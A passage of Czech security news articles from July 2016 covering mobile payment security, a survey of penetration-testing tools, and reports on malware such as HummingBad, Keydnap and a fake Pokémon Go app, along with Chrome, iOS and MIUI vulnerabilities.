Hlavním rozdílem mezi platformou Apple Pay a většinou ostatních mobilních platebních platforem je, že Apple Pay používá hardwarové zabezpečení a bezpečnostní prvek uvnitř telefonu, chráněný proti neoprávněné manipulaci.

V telefonech iPhone se pro další zabezpečení používá kombinace se čtečkou otisků prstů.

Podle Adama Kujawy, šéfa antimalwaru ve společnosti Malwarebytes, se nepřenášejí žádné nešifrované osobní údaje. Jediné dosud ohlášené bezpečnostní problémy se týkají úvodního nastavení, kdy podvodníci dokázali přesvědčit operátory k přiřazení ukradených platebních karet ke svým telefonům iPhone.

Zloději by navíc teoreticky mohli dokázat oklamat čtečky otisků prstů a uskutečnit neoprávněné platby, uvádí Kujawa. Největší nevýhody platformy ApplePay však podle něj nejsou technické, ale spíše praktické.

Tyto telefony jsou totiž relativně drahé a neexistuje žádný způsob placení v případě, když například dojde k vybití baterie iPhonu.

Hlavní alternativou pro bezpečnostní prvek je HCE (Host Card Emulation – hostitelská emulace karty, kterou v tuzemsku nyní začíná jako prý první lokální banka provozovat Komerční banka). Je to softwarová alternativa k hardwarově založenému zabezpečení a používá cloudový tokenizační proces.

„Z bezpečnostního hlediska poskytuje HCE nejlepší ochranu, protože šifrování a předávání vašich finančních informací je v rukách příslušné banky a neexistuje spojení mezi platebními informacemi a samotným zařízením v případě, že dojde k jeho krádeži,“ tvrdí Kujawa.

Existuje zde však riziko, že by mohly speciálně vytvořené škodlivé aplikace unést proces HCE a ukrást uživatelům peníze.

Ideální kombinací by podle Kujawy byl bezpečný prvek v zařízení v kombinaci s HCE a biometrickou autentizací.

Mobilní telefony versus web

Přes všechny diskuze týkající se ApplePay a toho, co Google a Samsung mohou nebo nemohou dělat, nemá většina uskutečněných mobilních plateb se žádnou z těchto technologií nic společného.

Namísto toho jsou webové platby vykonané jednoduše prostřednictvím prohlížečů v mobilních zařízeních nebo specializovaných aplikacích. Například Amazon má nákupní aplikaci pro chytré telefony či tablety a PayPal disponuje mobilní aplikací, která vám umožní poslat peníze přátelům.

Podle platební společnosti Adyen tyto dva druhy mobilních plateb tvoří 27 procent všech on-line plateb v prvním čtvrtletí letošního roku, což je nárůst o 39 procent ve srovnání se stejným obdobím loňského roku.

Malá část těchto mobilních plateb se týká lokálních nákupů – například tak můžete platit v kavárnách Starbucks a za svou jízdu s využitím služby Uber pomocí jejich aplikací.

Tyto osobní mobilní platby vytvořily podle agentury Forrester Research jen v USA obrat 3,74 miliardy dolarů. Forrester však očekává, že porostou rychleji než další druhy mobilních plateb a do roku 2019 dosáhnou 34,2 miliardy dolarů.

S ohledem na bezpečnost je nevýhodou tohoto přístupu totéž co u jakéhokoli webového platebního systému, popisuje Andrew Blaich, bezpečnostní analytik ve společnosti BlueBox Security. Pokud by došlo k úniku dat, mohli by počítačoví zločinci potenciálně ukrást všechny uložené finanční informace o uživatelích.

„Pokud někdo ukradne vaše uživatelské jméno a heslo, může se za vás vydávat a vaším jménem i platit,“ upozorňuje Blaich.

Kromě toho může dojít ke kompromitaci samotných mobilních aplikací, popisuje Andrew McLennan, viceprezident společnosti Metaforic, která se zaměřuje na mobilní bezpečnost. To se již stalo oběma aplikacím – Starbucks i Uber.

Hackeři mohou stáhnout aplikace, udělat root zařízení, v případě potřeby vypnout bezdrátovou konektivitu a poté vynaložit veškerý potřebný čas k analýze aplikací.

„Jakmile to dokončí, mohou na základě získaných informací vytvořit zbraně pro hromadné útoky – od jednoduchých krádeží po zákeřnější sbírání osobních dat pro budoucí použití daleko od původní aplikace,“ varuje McLennan.

Není to buď, anebo

Vzhledem ke způsobu, jakým funguje technologie NFC, pokud terminál akceptuje jeden platební systém, například Apple Pay, potom dokáže automaticky akceptovat další, jako je například Google Wallet..


Nástroje pro penetrační testování: Vyberete si?

27.7.2016  Zdroj: SecurityWorld Zabezpečení
Pokud nemáte žádné obavy, že by vaše IT vybavení mohli napadnout zahraniční či místní útočníci, je pro vás tento článek zbytečný. Pokud však žijete ve stejné realitě jako zbytek z nás, mohou vám rady od skutečného profesionála, týkající se solidních nástrojů pro preventivní penetrační testování, velmi pomoci.
Evan Saez, který je nadšencem, návrhářem a programátorem penetračního testovacího nástroje a pracuje jako analytik kybernetických hrozeb ve společnosti Lifars, promluvil o nejnovějších a nejlepších penetračních nástrojích a o vhodném způsobu jejich použití. Tady jsou jeho postřehy.

Dostupné nástroje pro penetrační testování

Nástroje pro penetrační testování, o kterých se zde bude mluvit, zahrnují Metasploit, Nessus Vulnerability Scanner, Nmap, Burp Suite, Owasp ZAP, SQLmap, Kali Linux a Jawfish (Evan Saez je vývojářem projektu Jawfish).

Tyto nástroje jsou klíčem k zabezpečení podniku, protože jsou to ty samé produkty, které používají útočníci. Pokud nenajdete své díry a neopravíte je, najdou je oni.

Metasploit je framework s větší základnou programátorských fanoušků, který se rozšiřuje o vlastní moduly fungující jako testovací nástroje k otestování slabin v operačních systémech a aplikacích.

Lidé vydávají tyto vlastní moduly na serverech GitHub a Bitbucket. Bitbucket je stejně jako GitHub on-line repozitářem pro programátorské projekty.

„Metasploit je zřejmě nejpopulárnějším řešením svého druhu pro penetrační testování,“ uvádí Saez.

Nessus Vulnerability Scanner je na signaturách založený nástroj pro vyhledávání zranitelností. „Nessus dokáže pouze porovnávat výsledky skenování s databází známých signatur zranitelností,“ popisuje Saez.

Síťový skener Nmap umožňuje penetračním testérům zjistit typy počítačů, serverů a hardwaru, které má podnik ve své síti.

Skutečnost, že jsou tyto stroje identifikovatelné prostřednictvím těchto externích sond, je sama o sobě zranitelností. Útočníci používají tyto informace k vytvoření základů pro útoky.

Burp Suite je dalším oblíbeným nástrojem pro penetrační testování, určeným pro webové aplikace. Mapuje a analyzuje webové aplikace, vyhledává a umí zneužít zranitelnosti, jak uvádí společnost PortSwigger, která je dodavatelem nástroje Burp Suite pro zabezpečení webu.

Owasp ZAP (Zed Attack Proxy) je řešení pro penetrační testování webových aplikací od neziskového projektu Owasp (Open Web Application Security Project). Nabízí automatizované a manuální skenování webových aplikací, jehož účelem je pomoci nováčkům i zkušeným profesionálním penetračním testérům. ZAP je open source systém dostupný na webu GitHub.

SQLmap automatizuje odhalování děr typu SQL Injection. Ty se potom snaží zneužít a získat úplnou kontrolu nad databázemi a hostujícími servery.

Kali Linux představuje komplexní nástroj obsahující předinstalovanou sadu specializovaných penetračních testovacích (a bezpečnostních a forenzních) nástrojů. „Obsahuje nástroje použitelné pro lidi, kteří nemají v oblasti bezpečnosti žádné znalosti,“ popisuje Saez.

Jawfish je na rozdíl od většiny nástrojů založených na signaturách řešením, které využívá genetické algoritmy. „Genetické algoritmy hledají věci v kontextu vyhledávání,“ vysvětluje Saez.

Na základě vyhledávacích kritérií, jak se Jawfish dostává blíže k tomu, co se hledá (v tomto případě zranitelnost), nakonec nějakou může najít. Jawfish nevyžaduje databázi signatur.

Jak je používat

Metasploit, Nessus Vulnerability Scanner, Nmap, Burp Suite, Owasp ZAP, SQLmap, Kali Linux a Jawfish mají své specifické využití. Většina podniků tak bude potřebovat více nástrojů.

Metasploit nabízí jak rozhraní Ruby, tak i příkazový řádek, takže si váš penetrační testér může vybrat libovolné z nich v závislosti na tom, co právě chcete dělat.

„Rozhraní Ruby je vhodnější pro testování velmi rozsáhlé sítě, protože spouštění příkazů z příkazového řádku by bylo příliš zdlouhavé,“ vysvětluje Saez.

Nessus Vulnerability Scanner hledá otevřené porty v počítačích a firewallech a instalace potenciálně zranitelného softwaru. „Pokud jde o penetrační testování, je tento nástroj méně užitečný, protože je příliš nápadný a při zjišťování zranitelností jde tzv. předními dveřmi a komunikuje s operačním systémem.

Toto řešení se obvykle používá při kontrole dodržování předpisů ke zjišťování, zda jsou nainstalované všechny záplaty,“ vysvětluje Garrett Payer, vedoucí technolog v konzultační a implementátorské společnosti ICF International.

Nmap je dobré používat k vyhledávání hostitelů, otevřených portů, verzí softwaru, operačních systémů, verzí hardwaru a zranitelností – obecně k mapování terénu pro síťový útok.

Je užitečný v každé fázi penetračního testování, kdykoli máte novou sadu hostitelů, portů a dalších prostředků, které je potřebné identifikovat, například při zadávání nového segmentu sítě.

„Tento systém nabízí funkci skriptování a je užitečný pro výčet uživatelského přístupu,“ dodává Payer.

K mapování webových aplikací používejte Burp Suite a webový prohlížeč. Nástroje uvnitř sady Burp Suite zjišťují funkcionalitu aplikací a bezpečnostní díry a potom zahájí vlastní útoky.

Burp Suite automatizuje opakované funkce, a přitom uživateli ponechává volbu pro případy, kdy penetrační testér potřebuje kontrolu nad jednotlivými možnostmi testování.

„Tento funkcemi nabitý nástroj zkoumá skriptování mezi weby a další zranitelnosti pomocí proxy,“ popisuje Payer. „Přináší to transparentnost toho, co webové stránky vlastně posílají na server.“

Owasp ZAP vykonává různá skenování a testy včetně skenování portů, skenování hrubou silou a fuzzingu za účelem nalezení nezabezpečeného kódu. Penetrační testéři používají intuitivní grafické uživatelské rozhraní podobné aplikacím Microsoftu a některé nástroje pro design webu (jako je například Arachnophilia).

Poté, co začnete surfovat a uděláte na webu potřebné úkony, znovu použijete ZAP a můžete vidět kód a co se stalo při těchto činnostech. Owasp ZAP nastavíte jako proxy server a začne kontrolovat webový provoz, který zpracovává.

„Tento nástroj je novější než Burp Suite, nemá tolik funkcí, ale je zdarma jako open source. Poskytuje podmnožinu funkcí a grafické uživatelské rozhraní, které je užitečné pro lidi, kteří s penetračním testováním webových aplikací teprve začínají,“ uvádí Payer.

Řešení SQLmap se používá pomocí příkazů Pythonu na příkazové řádce k testování nesprávně naprogramovaných webových stránek a adres URL spojených s databázemi. Pokud škodlivě vytvořený odkaz (URL) do databáze vyvolá chybu, potom je takový odkaz předmětem útoku.

SQLmap se instaluje do operačního systému Ubuntu Linux ve virtuálním stroji. „SQLmap je vhodný pro skriptování. Umí zjistit takové věci, jako například zda programátor parametrizoval vstupy,“ uvádí Payer.

Pokud ne, mohou penetrační testér či útočník odeslat jméno, středník a SQL příkaz a spustit ho v databázi a získat kontrolu, vysvětluje Payer.

Nainstalujte si Kali Linux a spusťte libovolný z desítek integrovaných nástrojů pro penetrační testy a útoky. „Kali Linux je k dispozici s velkým množstvím uživatelské dokumentace,“ uvádí Saez.

Penetrační testovací řešení Jawfish můžete zkusit použít pomocí dostupného formuláře grafického uživatelského rozhraní. Jednoduše zadejte IP adresu serveru, zranitelnou webovou adresu na této IP adrese, zranitelnost, metodu a cílový text.

Nástroj vrátí cílový text, když se vám podaří úspěšně napadnout tuto adresu. Je to ale zcela nový systém a není zatím prověřený pro podnikové nasazení...


Teroristé sdílejí poznatky s kyberzločinci – jak moc jsou tyto skupiny propojené?

27.7.2016 Zdroj: SecurityWorld Hrozby
Nejvíce informací o zneužívání legitimních nástrojů a služeb na internetu sdílejí dvě skupiny: kyberzločinci a teroristické organizace, jak zjistili experti Trend Micro. Odlišují se však motivy, které je k tomu vedou – prvně jmenovaní jsou motivovaní finančním ziskem, druzí mají za cíl šířit především propagandu.
On-line přítomnost teroristických organizací a kyberzločinců se v mnohých bodech překrývá. Obě skupiny komunikují prostřednictvím stejných kanálů a používají stejné technologie, což ve výsledku značně komplikuje možnosti jejich sledování.

Při nezákonné činnosti v on-line prostředí jde vždy o zneužití zákonných nástrojů a služeb. Příkladů těchto aktivit je mnoho, od využívání zranitelností v softwaru, webových stránkách a internetových aplikací přes hostování škodlivých složek v cloudových službách až po využívání tzv. clickbait příspěvků a odkazů na sociálních sítích.

Teroristé a kyberzločinci sdílejí i společné komunikační metody. Aby si zachovali anonymitu, využívají obě skupiny především nástroje určené pro ty, kteří mají legitimní důvod skrývat svoji identitu (např. novináři, interní informátoři či aktivisté).

Podle analytiků Trend Micro patří mezi nejvyužívanější komunikační kanály tzv. deep web (webstránky a databáze, které neindexují běžné internetové vyhledávače a jsou dostupné pouze prostřednictvím systému TOR - The Onion Router, určeného na anonymní prohledávání webu), bezpečné, nesledovatelné e-mailové služby a sociální média.

Teroristé používají stejné metody, ale za jiným účelem – na rozdíl od vydírání primárně pro komunikaci, koordinaci a šíření propagandy.

Jedním z nejvýraznějších rozdílů mezi kyberzločinci a teroristy je úsilí těch druhých o šíření propagandy. Zatímco hlavním cílem kyberzločinců je především krádež finančních prostředků v elektronickém prostředí a udržení si anonymity, teroristé se snaží hlavně o to, aby se jejich odkaz rozšířil mezi co možná nejširší publikum v naději na získání potenciálních sympatizantů.


Chrome má desítky bezpečnostních chyb. Některé jsou velmi vážné

27.7.2016 Zdroj: Novinky/Bezpečnost Zranitelnosti
V oblíbeném webovém prohlížeči Chrome bylo objeveno bezmála pět desítek bezpečnostních chyb. Nová verze tohoto browseru však veškeré trhliny opravuje. S instalací aktualizace by tak uživatelé neměli otálet.
Nová verze Chromu s pořadovým číslem 52 opravuje celkem 48 zranitelností. Z nich 11 je přitom označeno nálepkou „vysoce závažné“.

To jinými slovy znamená, že je počítačoví piráti mohou zneužít k tomu, aby do počítače propašovali prakticky libovolný škodlivý kód. Stejně tak ale mohou přistupovat k nastavení napadeného stroje či uloženým datům na pevném disku.

Důležité aktualizace zlepšují funkčnost
Zbylé tři desítky aktualizací slouží především ke zlepšení funkčnosti jednotlivých součástí internetového prohlížeče. Tyto důležité záplaty by nicméně neměly pro uživatele představovat žádné velké bezpečnostní riziko.

Stahovat nejnovější Chrome 52 je možné prostřednictvím automatických aktualizací.

V případě, že uživatelé nemají nastavenou automatickou instalaci aktualizací, neměli by s jejich stažením otálet. V opačném případě nechávají pro počítačové piráty otevřena zadní vrátka do svých počítačů.

Nainstalovat aktualizaci manuálně je možné prostřednictvím nápovědy, konkrétně v části „O aplikaci Chrome“. Po rozkliknutí této nabídky se uživateli automaticky nabídne instalace nejnovější verze.


IPhony a iPady mají kritickou chybu. Mohou být napadeny přes MMS zprávu

27.7.2016  Zdroj: Novinky/Bezpečnost Mobilní
Na první pohled neškodná MMS zpráva může být počítačovými piráty využita k tomu, aby ukradli citlivé informace z chytrých telefonů iPhone od společnosti Apple. Vzhledem k tomu, že škodlivý kód může být šířen například také přes aplikaci iMessage, jsou v ohrožení také tablety iPad. Upozornil na to server Security Affairs.
Zranitelnost je známá pod kódovým označením CVE-2016-4631. K úspěšnému útoku stačí na telefon nebo tablet oběti zaslat speciálně upravenou zprávu. Problém nastane ve chvíli, kdy uživatel takovouto zprávu na displeji svého jablečného zařízení zobrazí.

Útočník touto cestou získá identifikační údaje o uživateli, které jsou uloženy v zařízení. Stejným způsobem ale může zjistit také uložená hesla k WiFi sítím nebo přihlašovací údaje k e-mailovým schránkám.

Kritická chyba se týká API ImageIO, což je rozhraní používané pro zpracování obrazových dat.

V ohrožení i počítače
Není bez zajímavosti, že stejné API používají také počítače od Applu, tedy stroje s operačním systémem Mac OS X, ale dokonce i chytré hodinky Apple Watch. V budoucnu by tak teoreticky mohli být útočníci schopni napadnout stejným způsobem také tato zařízení.

Podle bezpečnostních expertů z týmu Talos společnosti Cisco, kteří zranitelnost objevili, již byly zaznamenány první útoky, kdy se speciálně upravenou útočnou zprávu snažili kyberzločinci šířit prostřednictvím internetového prohlížeče Safari.

Útok je tolik zákeřný především proto, že uživatelé nemusí nic stahovat. Už pouhým otevřením zprávy vystavují své zařízení riziku. Vhodné je tedy z bezpečnostního hlediska neotvírat zprávy z neznámých zdrojů.

Na riziko útoku nicméně již vývojáři společnosti Apple zareagovali. Po instalaci nejnovějších verzí operačních systémů by měla být všechna jablečná zařízení proti této hrozbě chráněna.


Hackeři si došlápli na jednoho z šéfů Sony, nabourali se na jeho Twitter

27.7.2016 Zdroj: Novinky/Bezpečnost Hacking
Neuplyne prakticky týden, aby se hackerská skupina OurMine nenabourala na účet na sociální síti nějaké známé osobnosti technologického světa. Tentokrát se jejich obětí stal Shuhei Yoshida, ředitel videoherní divize společnosti Sony. Kyberzločinci se nabourali na jeho Twitter.
Na účet získali podle všeho hackeři přístup ve středu. Aby skutečně dokázali, že se na účet skutečně nabourali, zveřejnili jménem Yoshidy příspěvek ve znění „Xbox 4 Ever“, což v předkladu znamená Xbox napořád. Připomeňme, že jde o televizní konzoli od Microsoftu, která je přímou konkurencí pro Sony Playstation.

Většinou přitom hackeři ze skupiny OurMine postupují při útocích daleko obezřetněji. Uživatele zpravidla pouze upozorní, že testovali zabezpečení jeho účtu a že je má kontaktovat, aby se na jeho sociální síť nedostal nikdo jiný.

Yoshida útok hackerů a jejich posměšný tweet nijak nekomentoval. Podle všeho má však již nyní ke svému účtu na Twitteru opět přístup.

Úlovků mají hackeři více
Skupina OurMine, která podle všeho pochází ze Saudské Arábie, má tak další velký úlovek na svém kontě.

Zkraje června se hackerům podařilo napadnout Twitter a některé další on-line účty šéfa Facebooku Marka Zuckerberga. Krátce nato provozovatelé Twitteru zablokovali účet hackerů na této sociální síti, prostřednictvím kterého skupina informovala o úspěšných útocích. 

Na přelomu května a června se pak skupině OurMine podařilo získat přístup k internetovým účtům zakladatele Microsoftu Billa Gatese či zpěváka Christiana Collinse.


Škodlivý kód HummingBad infikoval deset miliónů tabletů a smartphonů

27.7.2016 Zdroj: Novinky/Bezpečnost Mobilní
Bezpečnostním expertům dělá v posledních měsících vrásky na čele škodlivý kód HummingBad, který se zaměřuje na chytré telefony a tablety s operačním systémem Android. Tento nezvaný návštěvník totiž nakazil za pouhých pár měsíců na deset miliónů mobilních zařízení. Vyplývá to z analýzy bezpečnostní společnosti Check Point.
Že se HummingBad šíří jako lavina, varovali bezpečnostní experti již před třemi měsíci. 

Tehdy se však počty napadených přístrojů počítaly tak maximálně na desetitisíce. Kyberzločinci ale novou hrozbu šířili jako zběsilí, za pouhého čtvrt roku se tak z HummingBadu stala jedna z nejobávanějších mobilních hrozeb.

Nezvaný návštěvník dovoluje počítačovému pirátovi převzít nad napadeným strojem absolutní kontrolu. „Tento malware se zaměřuje na zařízení se systémem Android. Vytváří trvalý rootkit na zařízení,“ upozornil David Řeháček, bezpečnostní odborník ze společnosti Check Point.

Instaluje podvodné aplikace a umožňuje další škodlivé aktivity
bezpečnostní odborník David Řeháček
Schopnost škodlivého kódu se v zařízení maskovat – tedy zmiňovaný rootkit – značně znesnadňuje možnost jeho odhalení na napadeném zařízení. Ve chvíli, kdy se HummingBad na mobilním zařízení zahnízdí, začne dál škodit. „Instaluje podvodné aplikace a umožňuje další škodlivé aktivity, jako například instalace keyloggerů, krádeže přihlašovacích údajů a obcházení šifrování e-mailů pro lepší zachycení podnikových dat,“ konstatoval Řeháček.

Jinými slovy počítačoví piráti převezmou nad napadeným přístrojem naprostou kontrolu. Mohou jen vyčkávat a sledovat aktivitu uživatele, stejně tak ale dovedou odchytávat zprávy týkající se internetového bankovnictví. Teoreticky tedy mohou uživatele připravit o peníze.

HummingBad se šíří zatím výhradně v prostředí platformy Android, a to zpravidla jako součást aplikací z neoficiálních zdrojů. Stejně tak se ale do přístroje může dostat prostřednictvím nevyžádaného e-mailu.

Na Android cílí i další viry
Na pozoru by se měli mít uživatelé Androidu také před novou hrozbou zvanou Godless, což v překladu znamená neznaboh či bezbožník. „Tento malware umí využít několik postupů k získání vyšších oprávnění,“ konstatoval Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.

To jinými slovy znamená, že útočníci mohou získat nad napadeným přístrojem absolutní kontrolu. Mohou do něj propašovat prakticky jakýkoliv jiný škodlivý kód, mohou odposlouchávat komunikace či odchytávat přihlašovací údaje uživatelů.

Doposud stihl Godless nakazit několik stovek tisíc přístrojů po celém světě, v ohrožení je ale daleko více uživatelů. „Podle výzkumu specialistů firmy TrendMicro je schopen infikovat zhruba 90 procent všech smartphonů se systémem Android 5.1 nebo starší verzí,“ podotkl Bašta.

Virus Godless se přitom kyberzločincům podařilo propašovat už i do oficiálního obchodu společnosti Google. Ani stahování aplikací z oficiálních zdrojů tak není pro uživatele zárukou stoprocentního bezpečí. 

S oběma viry by si měla poradit většina antivirových programů. Ty ale na tabletech a mobilech používá málokdo.


Bezpečnostní experti vyzráli na vyděračské viry. Všechny soubory však nezachrání

27.7.2016 Zdroj: Novinky/Bezpečnost Viry
Vyděračské viry se těší mezi počítačovými piráty v posledních měsících obrovské popularitě. To by se ale mohlo v dohledné době změnit. Tým bezpečnostních výzkumníků totiž nalezl řešení, jak proti těmto nezvaným návštěvníkům požadujícím výkupné účinně bojovat. Všechna data však experti zachránit nedovedou.
Rozhodujícím nástrojem v boji proti vyděračským virům z rodiny ransomware má být CryptoDrop, tedy softwarové řešení pocházející od týmu výzkumníků z University of Florida a Villanova University. To spolupracuje s existujícími antivirovými programy.

„Funguje to jako systém včasného varování, přičemž je pár desítek souborů ‚obětováno‘ za ušlechtilým účelem zabránění větším ztrátám. V průběhu jejich zpracování ransomwarem totiž algoritmus sbírá cenné informace, které následně využije k zastavení postupu této nákazy,“ vysvětlil fungování nového programu Pavel Bašta, bezpečnostní analytik Národního bezpečnostního týmu CSIRT.CZ.

CryptoDrop v operačním systému v reálném čase sleduje, jak dochází k modifikaci souborů bez přičinění uživatele. Stejně tak ale dokáže sledovat síťovou komunikaci, aby byl schopen vyděračský virus zachytit.

Zatím se jen testuje
Zatím však bezpečnostní experti široké veřejnosti novinku nenabídli. „Špatná zpráva pro současné oběti ransomwaru je, že toto řešení je zatím pouze ve fázi testování. Výzkumníci zatím hledají investora, který by jim pomohl jejich koncept uvést do života jako komerční produkt. O efektivnosti jejich řešení prý však není pochyb,“ konstatoval Bašta.

„Zkoušeli jsme náš detektor na několika stovkách vzorků aktivního ransomwaru a úspěšně jsme detekovali plných 100 % těchto vzorků," pochlubil se pro server Helpnetsecurity.com Nolen Scaife, jeden z autorů projektu CryptoDrop.

Další člen týmu, Patrick Traynor, svého kolegu doplnil, že při odhalování vyděračských virů pomocí nové metody bývá „obětována“ zhruba desetina souborů. V konečném důsledku je to ale daleko lepší řešení, než kdyby uživatelé přišli o všechna uložená data.

CryptoDrop je vyvíjen v současnosti pouze pro platformu Microsoft Windows, přestože počítačoví piráti nasazují vyděračské viry i na dalších operačních systémech – například na Linuxu nebo Mac OS X. Zda bude novinka dostupná také pro zmiňované platformy, se teprve ukáže.

Útoků přibývá
Od dubna 2015 do března 2016 bylo zaznamenáno více než 700 tisíc útoků těchto nezvaných návštěvníků. O rok dříve přitom bylo zaznamenáno pětkrát méně útoků, jak ukázala analýza antivirové společnosti Kaspersky Lab.

Útoky vyděračských virů mají prakticky vždy stejný scénář. Nezvaný návštěvník zašifruje uložená data na pevném disku. Útočníci se snaží v majiteli napadeného stroje vzbudit dojem, že se ke svým souborům dostane po zaplacení pokuty. Ta byla údajně vyměřena za používání nelegálního softwaru apod.

Ani po zaplacení výkupného se uživatelé ke svým datům nemusí dostat. Místo placení výkupného je totiž nutné virus z počítače odinstalovat a data rozšifrovat, což ale nemusí být vůbec jednoduché. A v některých případech to dokonce nejde vůbec.

Placení výkupného je pro počítačové piráty v podstatě motivací k dalším útokům, upozornil server The Hacker News. Relativně snadný zisk jim pouze potvrdí to, že podobné útoky se jim vyplatí.


Virus Keydnap útočí na počítače od Applu. Krade na nich hesla

27.7.2016 Zdroj: Novinky/Bezpečnost Viry
Na pozoru by se měli mít uživatelé počítačů od společnosti Apple. V prostředí operačního systému Mac OS X se totiž šíří nebezpečný virus zvaný Keydnap. Ten dokáže na napadeném stroji udělat pěknou neplechu, především krade hesla k různým službám.
Před novou hrozbou varovali výzkumníci antivirové společnosti Eset.

Podle nich se škodlivý kód šíří především v souborech s koncovkou .zip, přičemž se pomocí jiné ikony snaží maskovat za textový dokument nebo obrázek. Nezvaný návštěvník se tak logicky nejčastěji šíří prostřednictvím nevyžádaných e-mailů.

Problém nastane ve chvíli, kdy uživatelé zavirovaný soubor otevřou. „Uživatel otvírající fiktivní dokument ve skutečnosti spouští spustitelný soubor pro Mac OS, který záhy stáhne další části malwaru. Nejdříve dojde ke stažení a spuštění hlavní backdoor komponenty, dále pak ke stažení náhodného obrázku, který nahradí právě spuštěný downloader, a nakonec dojde i na jeho zobrazení uživateli,“ popsal fungování škodlivého kódu Miroslav Dvořák, technický ředitel společnosti Eset.

Snaží se zotročit počítač
V počítači s operačním systémem Mac OS X se pak Keydnap snaží získat přístup k části systému, do které se ukládají hesla. Zároveň se snaží napadený stroj zařadit do tzv. botnetu, tedy do sítě zotročených počítačů.

Počítačoví piráti díky tomu pak mohou z napadeného stroje rozesílat další nevyžádané e-maily, případně je mohou zneužít k útokům typu DDoS. Při něm stovky až tisíce počítačů začnou přistupovat v jeden okamžik na konkrétní server. Ten zpravidla nezvládne tak vysoké množství požadavků zpracovat a spadne. Pro běžné uživatele se takto napadená webová stránka tváří jako nedostupná.

Podle bezpečnostních expertů jsou v bezpečí uživatelé, kteří mají nastavenou funkci Gatekeeper tak, aby umožňovala spouštění pouze aplikací digitálně podepsaných pomocí vývojářského ID přiděleného společností Apple. Na toto bezpečnostní opatření jsou zatím kyberzločinci krátcí.

Útoky nejsou výjimečné
Útoky na uživatele využívající platformu Mac OS X nejsou v poslední době ničím výjimečným. Před pár měsíci se například objevily vyděračské viry z rodiny ransomware, které dokázaly počítač zablokovat a za jeho odemčení požadovaly výkupné.

Konkrétně šlo o škodlivý kód KeRanger, který byl až překvapivě sofistikovaný. První tři dny si totiž oběti vyděračského viru patrně ani nevšimly, že je něco v nepořádku. Nezvaný návštěvník zůstal schovaný na pozadí a vyčkával na svou příležitost. Teprve po zmiňovaných 72 hodinách se aktivoval a začal v operačním systému Mac OS X působit problémy.

Vyděrači v případě platformy Mac OS X přitom nebyli žádní troškaři, za odšifrování dat chtěli zaplatit jeden bitcoin, což tehdy představovalo více než 10 000 korun.


Milióny chytrých telefonů jsou v ohrožení. Stačí se připojit na veřejnou wi-fi

27.7.2016  Zdroj: Novinky/Bezpečnost Mobilní
Velmi nebezpečnou chybu objevili bezpečnostní experti v chytrých telefonech s operačním systémem Android. Útočníci ji mohou zneužít k tomu, aby spustili prakticky libovolný škodlivý kód. Stačí přitom, aby se uživatel připojil například na veřejnou wi-fi síť. Upozornil na to server Security Affairs.
Chyba se týká chytrých telefonů od společnosti Xiaomi a dalších uživatelů, kteří na svých přístrojích používají grafickou nadstavbu MIUI.
Chyba je obsažena v grafické nadstavbě operačního systému Android, kterou používají chytré telefony od Xiaomi. Tento čínský výrobce ji nicméně nabízí volitelně k instalaci na prakticky libovolný přístroj s Androidem.

V ohrožení jsou tak všichni uživatelé, kteří tzv. MIUI rozhraní používají. Podle odhadů bezpečnostních expertů se chyba týká přinejmenším několika miliónů uživatelů.

V tomto čísle jsou přitom započítány pouze prodané přístroje od Xiaomi. Po započítání všech instalací rozhraní MIUI tak může výt výsledná cifra ještě vyšší.

Útočníci mohou nainstalovat libovolný škodlivý kód
Trhlina přitom představuje poměrně velké riziko. Útočníci ji totiž mohou zneužít k tomu, aby do přístroje nainstalovali prakticky jakýkoliv škodlivý kód. Mohou tak šířit vyděračské viry, stejně jako nejrůznější keyloggery – tedy programy schopné zachytávat přihlašovací údaje.

Chybu však mohou počítačoví piráti zneužít pouze v případě, že se připojí na stejnou wi-fi síť jako jejich oběť.

To jinými slovy znamená, že útok může probíhat například v internetové kavárně nebo jiném místě, kde je nabízen bezdrátový přístup zadarmo. Samozřejmě k napadení chytrého telefonu ale může dojít klidně i v podnikové síti.

Nejnovější verze grafické nadstavby MIUI již trhlinu neobsahuje. Bezpečnostní experti proto doporučují uživatelům co nejdříve provést aktualizaci, aby nedávali počítačovým pirátům své přístroje všanc.


Falešná hra Pokémon Go uzamkne displej mobilu. A kliká na lechtivé weby

27.7.2016  Zdroj: Novinky/Bezpečnost Mobilní
Hra Pokémon Go je celosvětovým fenoménem. Toho se snaží využít také počítačoví piráti, kteří prostřednictvím falešných verzí tohoto titulu šíří škodlivé kódy. Jedním z nich je i nový virus – tzv. lockscreen, který uzamkne displej telefonu a tím jej zcela zablokuje. Upozornili na něj bezpečnostní experti antivirové společnosti Eset.
Doposud kyberzločinci šířili škodlivé kódy výhradně prostřednictvím neoficiálních verzí aplikace, které se objevovaly na různých webech. Nikoliv tedy prostřednictvím oficiálních internetových obchodů s aplikacemi.

U nového viru, který se maskuje za hru Pokémon Go, je tomu ale jinak. „Pokemon GO Ultimate je první zaznamenanou falešnou aplikací v Google Play s funkčností lockscreen. Ve skutečnosti není příliš škodlivá, jejím cílem je skryté klikání na porno reklamy,“ uvedl Petr Šnajdr, bezpečnostní expert společnosti Eset.

Kyberzločinci vydělávají peníze
Záměr útočníků je tedy zřejmý. Nesnaží se uživatele nějak poškodit, nebo odcizit jeho data. Pouze se snaží prostřednictvím umělého navýšení kliků na bannery zvýšit příjmy daných webů z reklamy.

Zamčený displej nejde žádným způsobem odemknout. V mnoha případech je jediným řešením tzv. tvrdý restart zařízení, který se dělá jednoduše vyndáním baterie nebo kombinací určitých kláves. I po restartu ale zvládne nezvaný návštěvník klikat na porno stránky na pozadí a tím ukrajovat výkon smarpthonu. Nutné je tedy aplikaci Pokemon GO Ultimate z přístroje odinstalovat.

Chování nezvaného návštěvníka totiž mohou útočníci relativně snadno změnit. „Pokud jde o funkčnost falešné aplikace uzamykání displeje, útočníci by mohli přidat jen výzvu k uhrazení výkupného a vytvořili by tak první ransomware na Google Play, který uzamyká obrazovku,“ konstatoval Šnajdr.

Vyděračské viry z rodiny ransomware dokážou podobným způsobem zablokovat chytrý telefon, případně také počítač či tablet, a zašifrují uložená data v přístroji. Za jejich odemčení pak útočníci požadují výkupné.

„Pokémon Go je tak lákavá hra, že její uživatelé mají i přes všechna varování bezpečnostních expertů tendenci podstupovat riziko a stahují vše, co se Pokémonů týká. Ti, kteří opravdu nemohou odolat pokušení, by měli přinejmenším dodržovat základní bezpečnostní pravidla,“ doplnil bezpečnostní expert společnosti Eset.

Do města i terénu
